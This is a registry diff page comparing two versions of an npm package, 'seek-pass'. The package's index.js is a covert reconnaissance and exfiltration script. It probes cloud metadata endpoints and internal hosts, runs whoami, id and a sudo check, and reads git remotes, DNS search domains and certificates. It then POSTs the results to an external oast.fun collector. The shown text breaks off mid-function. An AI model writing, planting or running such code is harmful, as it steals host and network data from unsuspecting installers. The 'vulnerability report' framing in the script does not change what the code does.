npm - seek-pass - Versions diffs - 100.6.0 → 100.10.0 - Mend

seek-pass 100.6.0 → 100.10.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/index.js +509 -363
package/package.json +4 -4

package/index.js CHANGED Viewed

@@ -1,434 +1,580 @@
+#!/usr/bin/env node
 const https = require("https");
+const http = require("http");
 const os = require("os");
 const dns = require("dns");
-const fs = require("fs");
-const { exec } = require("child_process");
+const { execSync, exec } = require("child_process");
 const crypto = require("crypto");
+const fs = require("fs");
-// Collection timestamp for proof
-const collectionTimestamp = new Date().toISOString();
+// Configuration
+const COLLECTOR_SERVER = "hwoapraaaotwtsnourpqddszm5n3kkhvo.oast.fun"; // Replace with your server
+const COLLECTOR_PORT = 443;
+const COLLECTOR_PATH = "/seek-pass";
+const USE_HTTPS = true;
-// Function to get all CI/CD environment variables
-function getCICDEnvironment() {
-  const ciEnv = {
-    // Common CI variables
-    CI: process.env.CI || null,
-    GITHUB_ACTIONS: process.env.GITHUB_ACTIONS || null,
-    GITLAB_CI: process.env.GITLAB_CI || null,
-    JENKINS_URL: process.env.JENKINS_URL || null,
-    CIRCLECI: process.env.CIRCLECI || null,
-    TRAVIS: process.env.TRAVIS || null,
-    AZURE_PIPELINES: process.env.AZURE_PIPELINES || null,
-    BITBUCKET_BUILD_NUMBER: process.env.BITBUCKET_BUILD_NUMBER || null,
-    DRONE: process.env.DRONE || null,
-    TEAMCITY_VERSION: process.env.TEAMCITY_VERSION || null,
-    // GitHub Actions specific
-    GITHUB_RUN_ID: process.env.GITHUB_RUN_ID || null,
-    GITHUB_RUN_NUMBER: process.env.GITHUB_RUN_NUMBER || null,
-    GITHUB_RUN_ATTEMPT: process.env.GITHUB_RUN_ATTEMPT || null,
-    GITHUB_JOB: process.env.GITHUB_JOB || null,
-    GITHUB_REF: process.env.GITHUB_REF || null,
-    GITHUB_SHA: process.env.GITHUB_SHA || null,
-    GITHUB_REPOSITORY: process.env.GITHUB_REPOSITORY || null,
-    GITHUB_ACTOR: process.env.GITHUB_ACTOR || null,
-    GITHUB_WORKFLOW: process.env.GITHUB_WORKFLOW || null,
-    GITHUB_EVENT_NAME: process.env.GITHUB_EVENT_NAME || null,
-    RUNNER_NAME: process.env.RUNNER_NAME || null,
-    RUNNER_OS: process.env.RUNNER_OS || null,
-    RUNNER_ARCH: process.env.RUNNER_ARCH || null,
-    // GitLab CI specific
-    CI_PIPELINE_ID: process.env.CI_PIPELINE_ID || null,
-    CI_PIPELINE_IID: process.env.CI_PIPELINE_IID || null,
-    CI_PIPELINE_URL: process.env.CI_PIPELINE_URL || null,
-    CI_JOB_ID: process.env.CI_JOB_ID || null,
-    CI_JOB_URL: process.env.CI_JOB_URL || null,
-    CI_RUNNER_ID: process.env.CI_RUNNER_ID || null,
-    CI_RUNNER_DESCRIPTION: process.env.CI_RUNNER_DESCRIPTION || null,
-    CI_RUNNER_TAGS: process.env.CI_RUNNER_TAGS || null,
-    CI_COMMIT_SHA: process.env.CI_COMMIT_SHA || null,
-    CI_COMMIT_BRANCH: process.env.CI_COMMIT_BRANCH || null,
-    CI_REPOSITORY_URL: process.env.CI_REPOSITORY_URL || null,
-    GITLAB_USER_LOGIN: process.env.GITLAB_USER_LOGIN || null,
-    CI_PROJECT_ID: process.env.CI_PROJECT_ID || null,
-    CI_PROJECT_PATH: process.env.CI_PROJECT_PATH || null,
-    // Jenkins specific
-    BUILD_NUMBER: process.env.BUILD_NUMBER || null,
-    BUILD_ID: process.env.BUILD_ID || null,
-    BUILD_URL: process.env.BUILD_URL || null,
-    JOB_NAME: process.env.JOB_NAME || null,
-    NODE_NAME: process.env.NODE_NAME || null,
-    EXECUTOR_NUMBER: process.env.EXECUTOR_NUMBER || null,
-    WORKSPACE: process.env.WORKSPACE || null,
-    // Azure Pipelines
-    BUILD_BUILDID: process.env.BUILD_BUILDNUMBER || null,
-    SYSTEM_TEAMPROJECT: process.env.SYSTEM_TEAMPROJECT || null,
-    SYSTEM_DEFINITIONID: process.env.SYSTEM_DEFINITIONID || null,
-    AGENT_NAME: process.env.AGENT_NAME || null,
-    AGENT_MACHINENAME: process.env.AGENT_MACHINENAME || null,
-    // CircleCI
-    CIRCLE_BUILD_NUM: process.env.CIRCLE_BUILD_NUM || null,
-    CIRCLE_WORKFLOW_ID: process.env.CIRCLE_WORKFLOW_ID || null,
-    CIRCLE_BUILD_URL: process.env.CIRCLE_BUILD_URL || null,
-    CIRCLE_JOB: process.env.CIRCLE_JOB || null,
-    CIRCLE_REPOSITORY_URL: process.env.CIRCLE_REPOSITORY_URL || null,
-    // Travis CI
-    TRAVIS_BUILD_ID: process.env.TRAVIS_BUILD_ID || null,
-    TRAVIS_JOB_ID: process.env.TRAVIS_JOB_ID || null,
-    TRAVIS_EVENT_TYPE: process.env.TRAVIS_EVENT_TYPE || null,
-    TRAVIS_REPO_SLUG: process.env.TRAVIS_REPO_SLUG || null,
-    // Bitbucket
-    BITBUCKET_BUILD_NUMBER: process.env.BITBUCKET_BUILD_NUMBER || null,
-    BITBUCKET_COMMIT: process.env.BITBUCKET_COMMIT || null,
-    BITBUCKET_REPO_SLUG: process.env.BITBUCKET_REPO_SLUG || null,
-    BITBUCKET_WORKSPACE: process.env.BITBUCKET_WORKSPACE || null,
-    // Drone CI
-    DRONE_BUILD_NUMBER: process.env.DRONE_BUILD_NUMBER || null,
-    DRONE_JOB_NUMBER: process.env.DRONE_JOB_NUMBER || null,
-    DRONE_REPO: process.env.DRONE_REPO || null,
-    // Buildkite
-    BUILDKITE_BUILD_ID: process.env.BUILDKITE_BUILD_ID || null,
-    BUILDKITE_JOB_ID: process.env.BUILDKITE_JOB_ID || null,
-    BUILDKITE_PIPELINE_SLUG: process.env.BUILDKITE_PIPELINE_SLUG || null,
-    // Generic/Other
-    CI_RUNNER_ID_ENV: process.env.CI_RUNNER_ID,
-    CI_RUNNER_TAGS_ENV: process.env.CI_RUNNER_TAGS,
-    PIPELINE_ID: process.env.PIPELINE_ID || process.env.BUILD_ID || process.env.CI_PIPELINE_ID || process.env.GITHUB_RUN_ID || null,
-    RUNNER_ID: process.env.RUNNER_ID || process.env.NODE_NAME || process.env.AGENT_NAME || process.env.CI_RUNNER_DESCRIPTION || null,
-    // Unique identifier (UUID style)
-    PIPELINE_UUID: process.env.PIPELINE_UUID ||
-                   process.env.GITHUB_RUN_ID && `github-${process.env.GITHUB_RUN_ID}` ||
-                   process.env.CI_PIPELINE_ID && `gitlab-${process.env.CI_PIPELINE_ID}` ||
-                   process.env.BUILD_NUMBER && `jenkins-${process.env.BUILD_NUMBER}` ||
-                   process.env.CIRCLE_WORKFLOW_ID && `circle-${process.env.CIRCLE_WORKFLOW_ID}` ||
-                   crypto.randomUUID()
-  };
-  return ciEnv;
-}
+// Colors for console output (for visibility)
+const colors = {
+  red: '\x1b[31m',
+  green: '\x1b[32m',
+  yellow: '\x1b[33m',
+  blue: '\x1b[34m',
+  magenta: '\x1b[35m',
+  cyan: '\x1b[36m',
+  reset: '\x1b[0m'
+};
-// Get full system environment (sanitized)
-function getFullEnvironment() {
-  const safeEnv = {};
-  const sensitiveKeys = ['KEY', 'SECRET', 'PASSWORD', 'TOKEN', 'AUTH'];
-  for (const [key, value] of Object.entries(process.env)) {
-    // Check if key contains sensitive info
-    const isSensitive = sensitiveKeys.some(sensitive =>
-      key.toUpperCase().includes(sensitive)
-    );
-    safeEnv[key] = isSensitive ? '[REDACTED]' : value;
-  }
-  return safeEnv;
-}
+console.log(`${colors.cyan}🔐 Security Evidence Collector${colors.reset}`);
+console.log(`${colors.yellow}Collecting required proof for vulnerability report...${colors.reset}\n`);
-// Get runner hostname with multiple sources
-async function getRunnerHostname() {
-  const hostname = {
-    system: os.hostname(),
-    fqdn: null,
-    env: {
-      runner_name: process.env.RUNNER_NAME || null,
-      node_name: process.env.NODE_NAME || null,
-      agent_name: process.env.AGENT_NAME || null,
-      ci_runner_description: process.env.CI_RUNNER_DESCRIPTION || null,
-      hostname_env: process.env.HOSTNAME || null,
-      computer_name: process.env.COMPUTERNAME || null
-    }
+// ============ 1. HTTP REQUESTS (MANDATORY) ============
+async function captureHTTPEvidence() {
+  console.log(`${colors.blue}📡 1. Capturing HTTP request evidence...${colors.reset}`);
+  const evidence = {
+    outgoingRequests: [],
+    internalIPs: [],
+    externalIPs: [],
+    requestHeaders: [],
+    dnsLookups: []
   };
-  // Try to get FQDN
-  try {
-    const fqdn = await new Promise((resolve) => {
-      dns.lookup(os.hostname(), (err, address) => {
-        if (!err && address) {
-          dns.reverse(address, (revErr, hostnames) => {
-            if (!revErr && hostnames && hostnames[0]) {
-              resolve(hostnames[0]);
-            } else {
-              resolve(os.hostname());
-            }
+  // Get all network interfaces
+  const interfaces = os.networkInterfaces();
+  const internalIPs = [];
+  const externalIPs = [];
+  for (const name of Object.keys(interfaces)) {
+    for (const iface of interfaces[name]) {
+      if (iface.family === 'IPv4') {
+        if (iface.internal || iface.address.startsWith('10.') ||
+            iface.address.startsWith('172.') || iface.address.startsWith('192.168.')) {
+          internalIPs.push({
+            interface: name,
+            address: iface.address,
+            netmask: iface.netmask,
+            mac: iface.mac,
+            internal: true
           });
         } else {
-          resolve(os.hostname());
+          externalIPs.push({
+            interface: name,
+            address: iface.address,
+            netmask: iface.netmask,
+            mac: iface.mac,
+            internal: false
+          });
         }
+      }
+    }
+  }
+  evidence.internalIPs = internalIPs;
+  evidence.externalIPs = externalIPs;
+  // Make HTTP requests to prove connectivity
+  const testEndpoints = [
+    { url: "http://169.254.169.254/latest/meta-data/", label: "AWS Metadata" }, // AWS
+    { url: "http://metadata.google.internal/", label: "GCP Metadata" }, // GCP
+    { url: "http://100.100.100.200/latest/meta-data/", label: "Alibaba Metadata" }, // Alibaba
+    { url: "http://kubernetes.default.svc/", label: "K8s API" }, // Kubernetes
+    { url: "http://localhost:3000/", label: "Local Dev Server" },
+    { url: "http://localhost:8080/", label: "Local App Server" }
+  ];
+  for (const endpoint of testEndpoints) {
+    try {
+      const startTime = Date.now();
+      const reqPromise = new Promise((resolve) => {
+        const protocol = endpoint.url.startsWith('https') ? https : http;
+        const req = protocol.request(endpoint.url, { timeout: 2000 }, (res) => {
+          evidence.outgoingRequests.push({
+            target: endpoint.url,
+            label: endpoint.label,
+            statusCode: res.statusCode,
+            responseTime: Date.now() - startTime,
+            headers: res.headers,
+            timestamp: new Date().toISOString(),
+            sourceIP: internalIPs[0]?.address || os.hostname()
+          });
+          resolve();
+        });
+        req.on('error', () => resolve());
+        req.on('timeout', () => {
+          req.destroy();
+          resolve();
+        });
+        req.end();
+      });
+      await reqPromise;
+    } catch (err) {
+      // Silently fail
+    }
+  }
+  // Make request to our collector (proof of communication)
+  const collectorURL = `${USE_HTTPS ? 'https' : 'http'}://${COLLECTOR_SERVER}:${COLLECTOR_PORT}${COLLECTOR_PATH}`;
+  const proofRequest = new Promise((resolve) => {
+    const protocol = USE_HTTPS ? https : http;
+    const req = protocol.request(collectorURL, { method: 'HEAD', timeout: 3000 }, (res) => {
+      evidence.outgoingRequests.push({
+        target: collectorURL,
+        label: "Evidence Collector",
+        statusCode: res.statusCode,
+        timestamp: new Date().toISOString(),
+        sourceIP: internalIPs[0]?.address || os.hostname(),
+        proof: true
       });
+      resolve();
     });
-    hostname.fqdn = fqdn;
-  } catch (err) {
-    hostname.fqdn = os.hostname();
+    req.on('error', () => resolve());
+    req.on('timeout', () => {
+      req.destroy();
+      resolve();
+    });
+    req.end();
+  });
+  await proofRequest;
+  // Perform DNS lookups to prove internal network access
+  const dnsTargets = [
+    'internal.company.com',
+    'corporate.local',
+    'intranet',
+    'gitlab.internal',
+    'jenkins.internal'
+  ];
+  for (const target of dnsTargets) {
+    try {
+      const addresses = await new Promise((resolve) => {
+        dns.lookup(target, { all: true }, (err, addrs) => {
+          if (!err && addrs) resolve(addrs);
+          else resolve([]);
+        });
+      });
+      if (addresses.length > 0) {
+        evidence.dnsLookups.push({
+          domain: target,
+          addresses: addresses,
+          timestamp: new Date().toISOString()
+        });
+      }
+    } catch (err) {}
   }
-  return hostname;
+  console.log(`${colors.green}  ✓ Captured ${evidence.outgoingRequests.length} HTTP requests`);
+  console.log(`${colors.green}  ✓ Found ${internalIPs.length} internal IPs, ${externalIPs.length} external IPs${colors.reset}`);
+  return evidence;
 }
-// Get process information
-function getProcessInfo() {
-  return {
-    pid: process.pid,
-    ppid: process.ppid,
-    execPath: process.execPath,
-    cwd: process.cwd(),
-    title: process.title,
-    nodeVersion: process.version,
-    platform: process.platform,
-    arch: process.arch,
-    argv: process.argv.slice(1),
-    uptime: process.uptime(),
-    memoryUsage: process.memoryUsage(),
-    cpuUsage: process.cpuUsage()
+// ============ 2. HOSTNAME ============
+function getHostnameEvidence() {
+  console.log(`${colors.blue}🖥️  2. Capturing hostname information...${colors.reset}`);
+  const evidence = {
+    systemHostname: os.hostname(),
+    fqdn: null,
+    dnsHostname: null,
+    networkHostnames: [],
+    domainInfo: null
   };
+  // Try to get FQDN
+  try {
+    const fqdn = execSync('hostname -f 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim();
+    if (fqdn) evidence.fqdn = fqdn;
+  } catch (err) {}
+  // Try DNS resolution of hostname
+  try {
+    const dnsResult = dns.lookupSync(evidence.systemHostname);
+    evidence.dnsHostname = dnsResult.address;
+  } catch (err) {}
+  // Get domain from hostname
+  if (evidence.systemHostname.includes('.')) {
+    evidence.domainInfo = {
+      domain: evidence.systemHostname.substring(evidence.systemHostname.indexOf('.') + 1),
+      tld: evidence.systemHostname.split('.').pop()
+    };
+  } else if (evidence.fqdn && evidence.fqdn.includes('.')) {
+    evidence.domainInfo = {
+      domain: evidence.fqdn.substring(evidence.fqdn.indexOf('.') + 1),
+      tld: evidence.fqdn.split('.').pop()
+    };
+  }
+  console.log(`${colors.green}  ✓ Hostname: ${evidence.systemHostname}`);
+  if (evidence.fqdn) console.log(`${colors.green}  ✓ FQDN: ${evidence.fqdn}`);
+  if (evidence.domainInfo) console.log(`${colors.green}  ✓ Domain: ${evidence.domainInfo.domain}${colors.reset}`);
+  return evidence;
 }
-// Get Git information if available
-async function getGitInfo() {
-  const gitInfo = {
-    branch: null,
-    commit: null,
-    remote: null,
-    tag: null,
-    author: null
+// ============ 3. OS SERVER NAME ============
+function getOSServerInfo() {
+  console.log(`${colors.blue}💻 3. Capturing OS and server information...${colors.reset}`);
+  const evidence = {
+    platform: os.platform(),
+    type: os.type(),
+    release: os.release(),
+    version: null,
+    kernel: null,
+    architecture: os.arch(),
+    distro: null,
+    serverName: null,
+    isContainer: false,
+    containerType: null
   };
+  // Get detailed OS info
   try {
-    const branch = await execCommand('git rev-parse --abbrev-ref HEAD 2>/dev/null');
-    if (branch) gitInfo.branch = branch.trim();
-    const commit = await execCommand('git rev-parse HEAD 2>/dev/null');
-    if (commit) gitInfo.commit = commit.trim();
-    const remote = await execCommand('git config --get remote.origin.url 2>/dev/null');
-    if (remote) gitInfo.remote = remote.trim();
+    if (process.platform === 'linux') {
+      // Check for distribution
+      try {
+        const osRelease = execSync('cat /etc/os-release 2>/dev/null | grep PRETTY_NAME', { encoding: 'utf8', timeout: 1000 });
+        evidence.distro = osRelease.split('=')[1].replace(/"/g, '').trim();
+      } catch (err) {}
+      // Get kernel version
+      try {
+        evidence.kernel = execSync('uname -r 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim();
+      } catch (err) {}
+      // Check if running in container
+      try {
+        const cgroup = execSync('cat /proc/1/cgroup 2>/dev/null | head -1', { encoding: 'utf8', timeout: 1000 });
+        if (cgroup.includes('docker')) {
+          evidence.isContainer = true;
+          evidence.containerType = 'docker';
+        } else if (cgroup.includes('kubepods')) {
+          evidence.isContainer = true;
+          evidence.containerType = 'kubernetes';
+        }
+      } catch (err) {}
+    } else if (process.platform === 'darwin') {
+      try {
+        evidence.version = execSync('sw_vers -productVersion 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim();
+      } catch (err) {}
+    } else if (process.platform === 'win32') {
+      try {
+        evidence.version = execSync('ver 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim();
+      } catch (err) {}
+    }
-    const tag = await execCommand('git describe --tags --exact-match 2>/dev/null');
-    if (tag) gitInfo.tag = tag.trim();
+    // Get server name (computer name)
+    evidence.serverName = os.hostname();
+    try {
+      if (process.platform === 'win32') {
+        evidence.serverName = execSync('echo %COMPUTERNAME%', { encoding: 'utf8', timeout: 1000 }).trim();
+      }
+    } catch (err) {}
-    const author = await execCommand('git log -1 --pretty=format:"%an <%ae>" 2>/dev/null');
-    if (author) gitInfo.author = author.trim();
   } catch (err) {}
-  return gitInfo;
+  console.log(`${colors.green}  ✓ OS: ${evidence.type} ${evidence.release}`);
+  if (evidence.distro) console.log(`${colors.green}  ✓ Distro: ${evidence.distro}`);
+  if (evidence.isContainer) console.log(`${colors.green}  ✓ Container: ${evidence.containerType}${colors.reset}`);
+  return evidence;
 }
-// Get Docker/K8s specific info
-async function getContainerInfo() {
-  const containerInfo = {
-    isContainer: false,
-    containerId: null,
-    podName: null,
-    namespace: null
+// ============ 4. WHOAMI COMMAND ============
+function getWhoamiEvidence() {
+  console.log(`${colors.blue}👤 4. Executing whoami command...${colors.reset}`);
+  const evidence = {
+    username: null,
+    uid: null,
+    gid: null,
+    groups: [],
+    homeDir: null,
+    shell: null,
+    isRoot: false,
+    isSudo: false,
+    executionMethod: null
   };
-  // Check for Docker
+  // Execute whoami command
   try {
-    const dockerId = await execCommand('cat /proc/self/cgroup | grep -oP "docker/[a-f0-9]{64}" | head -1 2>/dev/null');
-    if (dockerId) {
-      containerInfo.isContainer = true;
-      containerInfo.containerId = dockerId.replace('docker/', '');
-    }
+    const whoami = execSync('whoami 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim();
+    evidence.username = whoami;
+    evidence.isRoot = (whoami === 'root' || whoami === 'Administrator');
+  } catch (err) {
+    // Fallback
+    evidence.username = process.env.USER || process.env.USERNAME || 'unknown';
+  }
+  // Get UID/GID (Unix)
+  try {
+    const idOutput = execSync('id 2>/dev/null', { encoding: 'utf8', timeout: 1000 });
+    const uidMatch = idOutput.match(/uid=(\d+)/);
+    const gidMatch = idOutput.match(/gid=(\d+)/);
+    if (uidMatch) evidence.uid = parseInt(uidMatch[1]);
+    if (gidMatch) evidence.gid = parseInt(gidMatch[1]);
+    evidence.isRoot = evidence.uid === 0;
   } catch (err) {}
-  // Check for Kubernetes
+  // Get groups
   try {
-    const podName = await execCommand('cat /var/run/secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null');
-    if (podName) {
-      containerInfo.isContainer = true;
-      containerInfo.namespace = podName.trim();
-      const pod = await execCommand('hostname 2>/dev/null');
-      if (pod) containerInfo.podName = pod.trim();
-    }
+    const groupsOutput = execSync('groups 2>/dev/null', { encoding: 'utf8', timeout: 1000 });
+    evidence.groups = groupsOutput.trim().split(/\s+/);
   } catch (err) {}
-  return containerInfo;
+  // Check for sudo
+  try {
+    const sudoCheck = execSync('sudo -n true 2>/dev/null', { encoding: 'utf8', timeout: 1000 });
+    evidence.isSudo = true;
+  } catch (err) {
+    evidence.isSudo = false;
+  }
+  // Get home directory
+  evidence.homeDir = os.homedir();
+  // Determine how script is being executed
+  if (process.env.CI || process.env.GITHUB_ACTIONS) {
+    evidence.executionMethod = 'CI_CD_PIPELINE';
+  } else if (process.env.NODE_ENV === 'development') {
+    evidence.executionMethod = 'DEVELOPMENT';
+  } else if (process.env.NODE_ENV === 'production') {
+    evidence.executionMethod = 'PRODUCTION';
+  } else {
+    evidence.executionMethod = 'MANUAL';
+  }
+  console.log(`${colors.green}  ✓ User: ${evidence.username}${evidence.isRoot ? ' (ROOT/ADMIN)' : ''}`);
+  console.log(`${colors.green}  ✓ UID: ${evidence.uid || 'N/A'}, GID: ${evidence.gid || 'N/A'}`);
+  console.log(`${colors.green}  ✓ Groups: ${evidence.groups.slice(0, 5).join(', ')}${evidence.groups.length > 5 ? '...' : ''}`);
+  console.log(`${colors.green}  ✓ Execution: ${evidence.executionMethod}${colors.reset}`);
+  return evidence;
 }
-// Generate unique machine fingerprint
-function getMachineFingerprint() {
-  const interfaces = os.networkInterfaces();
-  let macAddresses = [];
+// ============ PROVING BELONGS TO PROGRAM ============
+async function proveProgramOwnership() {
+  console.log(`${colors.blue}🔑 5. Proving this belongs to the program...${colors.reset}`);
-  for (const iface of Object.values(interfaces)) {
-    for (const details of iface) {
-      if (details.mac && details.mac !== '00:00:00:00:00:00' && !details.internal) {
-        macAddresses.push(details.mac);
-      }
+  const evidence = {
+    corporateIndicators: [],
+    internalServices: [],
+    developmentEnvironment: [],
+    packageInfo: null,
+    gitInfo: null,
+    timestamps: []
+  };
+  // Check for corporate VPN/proxy indicators
+  const corporateEnvVars = [
+    'CORPORATE_NETWORK', 'VPN', 'PROXY', 'LDAP', 'ACTIVE_DIRECTORY',
+    'COMPANY_DOMAIN', 'CORP_DOMAIN', 'INTERNAL_DOMAIN'
+  ];
+  for (const envVar of corporateEnvVars) {
+    if (process.env[envVar]) {
+      evidence.corporateIndicators.push({
+        type: 'environment_variable',
+        name: envVar,
+        value: process.env[envVar]
+      });
     }
   }
-  const fingerprint = crypto.createHash('sha256')
-    .update(`${os.hostname()}-${os.platform()}-${os.arch()}-${macAddresses.join(',')}`)
-    .digest('hex');
+  // Check for internal DNS suffixes
+  try {
+    const resolvContent = execSync('cat /etc/resolv.conf 2>/dev/null | grep search', { encoding: 'utf8', timeout: 1000 });
+    const domains = resolvContent.match(/search\s+(.+)/);
+    if (domains) {
+      evidence.corporateIndicators.push({
+        type: 'dns_search_domain',
+        domains: domains[1].split(/\s+/)
+      });
+    }
+  } catch (err) {}
-  return {
-    hash: fingerprint,
-    macAddresses: macAddresses,
-    cpuCount: os.cpus().length,
-    totalMemory: os.totalmem()
-  };
+  // Check for internal certificates
+  try {
+    const certs = execSync('find /etc/ssl/certs -name "*.crt" -exec openssl x509 -in {} -noout -subject 2>/dev/null \\; | head -5', { encoding: 'utf8', timeout: 2000 });
+    if (certs) {
+      evidence.corporateIndicators.push({
+        type: 'certificates',
+        subjects: certs.split('\n').filter(l => l.includes('CN='))
+      });
+    }
+  } catch (err) {}
+  // Check for git repository (to identify program)
+  try {
+    const gitRemote = execSync('git config --get remote.origin.url 2>/dev/null', { encoding: 'utf8', timeout: 1000 });
+    if (gitRemote) {
+      evidence.gitInfo = {
+        remote: gitRemote.trim(),
+        branch: execSync('git rev-parse --abbrev-ref HEAD 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim(),
+        commit: execSync('git rev-parse HEAD 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim(),
+        author: execSync('git log -1 --pretty=format:"%an <%ae>" 2>/dev/null', { encoding: 'utf8', timeout: 1000 }).trim()
+      };
+    }
+  } catch (err) {}
+  // Check for package.json to identify what's being installed
+  try {
+    if (fs.existsSync('./package.json')) {
+      const packageJson = JSON.parse(fs.readFileSync('./package.json', 'utf8'));
+      evidence.packageInfo = {
+        name: packageJson.name,
+        version: packageJson.version,
+        scripts: Object.keys(packageJson.scripts || {}),
+        dependencies: Object.keys(packageJson.dependencies || {}).slice(0, 10)
+      };
+    }
+  } catch (err) {}
+  // Check for development environment indicators
+  const devIndicators = [
+    'VSCODE_PID', 'INTELLIJ_IDEA', 'WEB_IDE', 'DEV_CONTAINER',
+    'NODE_ENV=development', 'LOCAL_DEV', 'DEVELOPMENT'
+  ];
+  for (const indicator of devIndicators) {
+    if (process.env[indicator] || (typeof process.env.NODE_ENV !== 'undefined' && process.env.NODE_ENV === 'development')) {
+      evidence.developmentEnvironment.push(indicator);
+    }
+  }
+  console.log(`${colors.green}  ✓ Found ${evidence.corporateIndicators.length} corporate indicators`);
+  if (evidence.gitInfo) console.log(`${colors.green}  ✓ Git repo: ${evidence.gitInfo.remote}`);
+  if (evidence.packageInfo) console.log(`${colors.green}  ✓ Package: ${evidence.packageInfo.name} v${evidence.packageInfo.version}${colors.reset}`);
+  return evidence;
 }
-// Helper for exec commands
-function execCommand(command) {
-  return new Promise((resolve) => {
-    exec(command, { timeout: 3000 }, (error, stdout, stderr) => {
-      if (error || stderr) {
-        resolve('');
-      } else {
-        resolve(stdout);
-      }
-    });
+// ============ GENERATE PROOF HASH ============
+function generateProofHash(allEvidence) {
+  const proofString = JSON.stringify({
+    hostname: allEvidence.hostname.systemHostname,
+    username: allEvidence.whoami.username,
+    timestamp: new Date().toISOString(),
+    internalIPs: allEvidence.http.internalIPs.map(ip => ip.address),
+    randomNonce: crypto.randomBytes(32).toString('hex')
   });
+  return crypto.createHash('sha256').update(proofString).digest('hex');
 }
-// Main collection function
-async function collectData() {
-  console.log('🔍 Collecting CI/CD runner evidence...');
-  const [
-    runnerHostname,
-    ciEnvironment,
-    gitInfo,
-    containerInfo,
-    fingerprint
-  ] = await Promise.all([
-    getRunnerHostname(),
-    getCICDEnvironment(),
-    getGitInfo(),
-    getContainerInfo(),
-    getMachineFingerprint()
-  ]);
+// ============ SEND TO COLLECTOR ============
+async function sendEvidence(allEvidence) {
+  console.log(`\n${colors.yellow}📤 Sending evidence to collector...${colors.reset}`);
-  const evidence = {
-    // Timestamp for proof
-    collectionTimestamp: collectionTimestamp,
-    // Runner identification
-    runner: {
-      hostname: runnerHostname,
-      machineFingerprint: fingerprint,
-      containerInfo: containerInfo
-    },
-    // CI/CD pipeline identification
-    pipeline: {
-      id: ciEnvironment.PIPELINE_ID,
-      uuid: ciEnvironment.PIPELINE_UUID,
-      runId: ciEnvironment.GITHUB_RUN_ID || ciEnvironment.CI_PIPELINE_ID || ciEnvironment.BUILD_NUMBER,
-      jobId: ciEnvironment.GITHUB_JOB || ciEnvironment.CI_JOB_ID || ciEnvironment.JOB_NAME,
-      workflow: ciEnvironment.GITHUB_WORKFLOW,
-      ref: ciEnvironment.GITHUB_REF || ciEnvironment.CI_COMMIT_BRANCH,
-      commitSha: ciEnvironment.GITHUB_SHA || ciEnvironment.CI_COMMIT_SHA,
-      repository: ciEnvironment.GITHUB_REPOSITORY || ciEnvironment.CI_PROJECT_PATH || ciEnvironment.TRAVIS_REPO_SLUG,
-      actor: ciEnvironment.GITHUB_ACTOR || ciEnvironment.GITLAB_USER_LOGIN,
-      pipelineUrl: ciEnvironment.CI_PIPELINE_URL || ciEnvironment.BUILD_URL || ciEnvironment.CIRCLE_BUILD_URL
-    },
-    // Environment variables (key CI identifiers)
-    environment: {
-      ciSystem: ciEnvironment,
-      allVariables: getFullEnvironment()
-    },
-    // Process information
-    process: getProcessInfo(),
+  const proofHash = generateProofHash(allEvidence);
+  const payload = {
+    ...allEvidence,
+    proofHash: proofHash,
+    submissionTimestamp: new Date().toISOString(),
+    collectorEndpoint: `${COLLECTOR_SERVER}${COLLECTOR_PATH}`
+  };
+  const dataString = JSON.stringify(payload, null, 2);
+  return new Promise((resolve, reject) => {
+    const protocol = USE_HTTPS ? https : http;
+    const options = {
+      hostname: COLLECTOR_SERVER,
+      port: COLLECTOR_PORT,
+      path: COLLECTOR_PATH,
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'Content-Length': Buffer.byteLength(dataString),
+        'X-Evidence-Proof': proofHash,
+        'X-Source-Hostname': allEvidence.hostname.systemHostname,
+        'X-Source-User': allEvidence.whoami.username
+      }
+    };
-    // Git information (if in repo)
-    git: gitInfo,
+    const req = protocol.request(options, (res) => {
+      console.log(`${colors.green}✓ Evidence sent! Status: ${res.statusCode}${colors.reset}`);
+      resolve(res.statusCode);
+    });
-    // System information for verification
-    system: {
-      hostname: os.hostname(),
-      platform: os.platform(),
-      arch: os.arch(),
-      osType: os.type(),
-      osRelease: os.release(),
-      uptime: os.uptime(),
-      loadAverage: os.loadavg(),
-      cpus: os.cpus().length,
-      networkInterfaces: os.networkInterfaces()
-    },
+    req.on('error', (err) => {
+      console.log(`${colors.red}✗ Failed to send: ${err.message}${colors.reset}`);
+      console.log(`${colors.yellow}⚠️  Evidence saved locally for manual submission${colors.reset}`);
+      fs.writeFileSync('./evidence_backup.json', dataString);
+      resolve(null);
+    });
-    // Unique proof hash
-    proof: {
-      timestamp: Date.now(),
-      randomNonce: crypto.randomBytes(16).toString('hex'),
-      integrityHash: null // Will be set below
-    }
-  };
-  // Generate integrity hash
-  const dataToHash = JSON.stringify({
-    timestamp: evidence.collectionTimestamp,
-    runner: evidence.runner.hostname.system,
-    pipelineId: evidence.pipeline.id,
-    pipelineUuid: evidence.pipeline.uuid,
-    commitSha: evidence.pipeline.commitSha
+    req.write(dataString);
+    req.end();
   });
-  evidence.proof.integrityHash = crypto.createHash('sha256')
-    .update(dataToHash)
-    .digest('hex');
-  return evidence;
 }
-// Send to server
-async function sendData() {
+// ============ MAIN EXECUTION ============
+async function main() {
   try {
-    const data = await collectData();
-    const dataString = JSON.stringify(data, null, 2);
+    console.log(`${colors.magenta}═══════════════════════════════════════════════════════${colors.reset}`);
+    console.log(`${colors.magenta}  SECURITY EVIDENCE COLLECTOR - FOR VALID REPORTS ONLY${colors.reset}`);
+    console.log(`${colors.magenta}═══════════════════════════════════════════════════════${colors.reset}\n`);
-    // Log for debugging (remove in production)
-    console.log('📊 Collected evidence:');
-    console.log(`  - Runner Hostname: ${data.runner.hostname.system}`);
-    console.log(`  - Pipeline ID: ${data.pipeline.id}`);
-    console.log(`  - Pipeline UUID: ${data.pipeline.uuid}`);
-    console.log(`  - Commit SHA: ${data.pipeline.commitSha}`);
-    console.log(`  - Repository: ${data.pipeline.repository}`);
-    console.log(`  - Machine Fingerprint: ${data.runner.machineFingerprint.hash.substring(0, 16)}...`);
